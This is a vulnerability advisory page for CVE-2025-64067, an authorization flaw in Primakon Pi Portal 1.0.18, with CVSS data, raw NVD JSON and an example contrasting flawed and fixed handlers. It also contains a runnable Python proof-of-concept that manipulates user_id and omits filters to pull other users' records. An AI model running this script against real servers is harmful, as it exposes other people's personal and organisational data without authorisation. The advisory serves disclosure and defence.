Security Vulnerability Report
CVE-2025-64067 CVSS 5.3 MEDIUM

CVE-2025-64067

Published: 2025-11-25 19:15:51
Last Modified: 2025-12-01 14:22:53

Description

Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways. Direct ID manipulation (IDOR): by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user. Filter omission: by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information.
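The missing server-side check described above, as an added example that is not code from Primakon Pi Portal or from the advisory: a flawed handler pair that trusts the request to define scope, next to a corrected pair that derives scope from the authenticated session. The `Session` type, handler names, field names and records are hypothetical and constructed for illustration, and the session is assumed to have been authenticated upstream.

```python
# Added illustration: constructed records and hypothetical handler names,
# not Primakon Pi Portal code. `session` is assumed to be authenticated upstream.
from dataclasses import dataclass

@dataclass(frozen=True)
class Session:
    user_id: int
    is_admin: bool = False

PROFILES = {1: {"user_id": 1, "email": "alice@example.test"},
            2: {"user_id": 2, "email": "bob@example.test"}}
PROJECTS = [{"project_id": 10, "owner_id": 1, "name": "Bridge tender"},
            {"project_id": 11, "owner_id": 2, "name": "Rail contract"}]

class Forbidden(Exception):
    """Would map to HTTP 403 in a real handler."""

# --- Flawed pattern from the description: the request alone decides scope ---
def get_profile_flawed(session, params):
    return PROFILES.get(int(params["user_id"]))       # no ownership check

def list_projects_flawed(session, params):
    owner = params.get("owner_id")
    if owner is None:                                  # filter omitted
        return list(PROJECTS)                          # every user's records
    return [p for p in PROJECTS if p["owner_id"] == int(owner)]

# --- Corrected pattern: scope is derived from the authenticated session ---
def get_profile(session, params):
    requested = int(params.get("user_id", session.user_id))
    if requested != session.user_id and not session.is_admin:
        raise Forbidden(f"user {session.user_id} may not read profile {requested}")
    return PROFILES.get(requested)

def list_projects(session, params):
    owner = params.get("owner_id")
    if session.is_admin:
        # Only an administrator may widen or drop the filter.
        return [p for p in PROJECTS if owner is None or p["owner_id"] == int(owner)]
    if owner is not None and int(owner) != session.user_id:
        raise Forbidden("owner_id does not match the authenticated user")
    # A missing filter defaults to the caller's own records, never to "all".
    return [p for p in PROJECTS if p["owner_id"] == session.user_id]
```

The corrected handlers treat the client-supplied ID and filter as a request to narrow results within what the session already permits, so both a changed ID and a dropped filter fail closed.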

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:* - VULNERABLE
Primakon Pi Portal 1.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-64067 PoC - IDOR in Primakon Pi Portal 1.0.18
# Target: Primakon Pi Portal API endpoints
# Vulnerability: Insecure Direct Object Reference (IDOR)

TARGET_URL = "http://target-server.com/api"
VULN_ENDPOINT = "/api/user/profile"


# PoC 1: Direct ID Manipulation
def exploit_direct_id_manipulation():
    """
    Exploit by changing user_id parameter to access other users' data
    """
    print("[*] Testing Direct ID Manipulation...")

    # Original request (legitimate user with ID 1)
    original_payload = {"user_id": 1}

    # Attacker changes user_id to target user (e.g., ID 100)
    manipulated_payload = {"user_id": 100}

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    # Send request with manipulated ID
    response = requests.get(
        f"{TARGET_URL}{VULN_ENDPOINT}",
        params=manipulated_payload,
        headers=headers,
        timeout=10
    )

    if response.status_code == 200:
        print("[+] Successfully accessed user data via ID manipulation")
        print(f"[+] Response: {response.text}")
        return response.json()
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        return None


# PoC 2: Filter Omission Attack
def exploit_filter_omission():
    """
    Exploit by omitting filter parameters to retrieve all records
    """
    print("[*] Testing Filter Omission Attack...")

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    # Request without any filter parameter
    response = requests.get(
        f"{TARGET_URL}/api/projects/list",
        headers=headers,
        timeout=10
    )

    if response.status_code == 200:
        data = response.json()
        if isinstance(data, list) and len(data) > 1:
            print(f"[+] Successfully retrieved unfiltered dataset")
            print(f"[+] Total records: {len(data)}")
            print(f"[+] Sample data: {json.dumps(data[:2], indent=2)}")
            return data
        else:
            print("[-] Unexpected response format")
            return None
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-64067 PoC - Primakon Pi Portal IDOR")
    print("=" * 60)

    # Test both exploitation techniques
    exploit_direct_id_manipulation()
    print()
    exploit_filter_omission()
```

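References

https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64067.md (Third Party Advisory)
https://www.primakon.com/rjesenja/primakon-pcm/ (Product)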

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64067", "sourceIdentifier": "[email protected]", "published": "2025-11-25T19:15:50.907", "lastModified": "2025-12-01T14:22:52.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways: Direct ID manipulation and IDOR, by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user; and filter Omission, by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:primakon:project_contract_management:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "48EDD273-2C46-43C9-9473-27D2C14040CB"}]}]}], "references": [{"url": 
"https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64067.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.primakon.com/rjesenja/primakon-pcm/", "source": "[email protected]", "tags": ["Product"]}]}}